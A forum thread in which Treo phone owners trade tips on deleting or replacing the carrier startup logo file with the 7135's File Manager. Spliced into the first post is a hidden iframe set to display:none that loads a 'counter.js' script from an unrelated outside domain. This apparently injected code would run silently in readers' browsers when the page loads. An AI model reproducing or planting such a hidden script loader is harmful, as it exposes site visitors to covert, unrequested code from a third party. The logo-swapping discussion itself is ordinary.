I have no idea whether this would work on a 7135. There is also a thread on the 6035 message board. But some of the referenced links there don't work.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Sure Verizon can do it. If they can put in their own logo, they can take out an Alltell logo. But until Verizon is actually selling the phones I wouldn't count on them for any help. After Verizon has been selling the phone for a few months, I will take my Alltell phone to them and ask them to re-flash it in accordance with Verizon specs and settings.
Woooohooooooo that does it, you can use File Manager which comes with the 7135. It is located in the QCQT databases and is 15.2k. I just moved it to my SD card and powered phone off and on and its gone. To double check it I moved it back and there it was again! Thanks pdageek, it didnt bother me much but now that there is nothing I like it even better - no verizon as well!
I wonder if you can replace it with something else the same size with the same name.
I would love to change my ALLTEL log to something else.
Jeff

I just got rid of the verizon logo, thanks boinker for the tip. File name in my phone is CarrierLogo123.pdb. How can we go about creating a new file? I imagine changing a jpeg, tiff, whatever to the same file name/type and then inserting it.
I don't think the 6035 method will work. This doc talks about a bitmap image and also requires that someone use a "pst". The pst is a tool that carrier techs use for programing and manipulating settings in phones. Not available to the public.
it has been determined that the startup logo is a pdb file???? One can remove it with the 7135 file manager. Now it is just a matter of inserting the correct new file.
I am interested in making this happen, looking for ideas and input on methods and file types.

Please thank pdageek, I just carried it out his idea! I have tried folling around with converting some files and renaming them but am having some hotsynch problems. I will keep you posted. Thanks again pdageek!
We should be able to convert a VZW logo into a pdb using PhotoSuite.
I tried pulling a logo off their site and converting from a gif to a bmp or jpg which PhotoSuite is supposed to support but I PhotoSuite won't let me add.
The logo is a raw bmp file @ 8-bit (256 colors). If you rename it to the same thing and can manage to replace the one int he ahndset already, it should work.
Based on what I have seen with the Verizon & Sprint reps you could really have some fun and create some confusion and arguments by putting in the T-Mobile or AT&T logo and taking the phone down to the local store and show them what their competitors have. Assuming there is not external logo's.
We did custom logo's on our 6035's at work. It always impressed people when we allowed them to play with our phones.
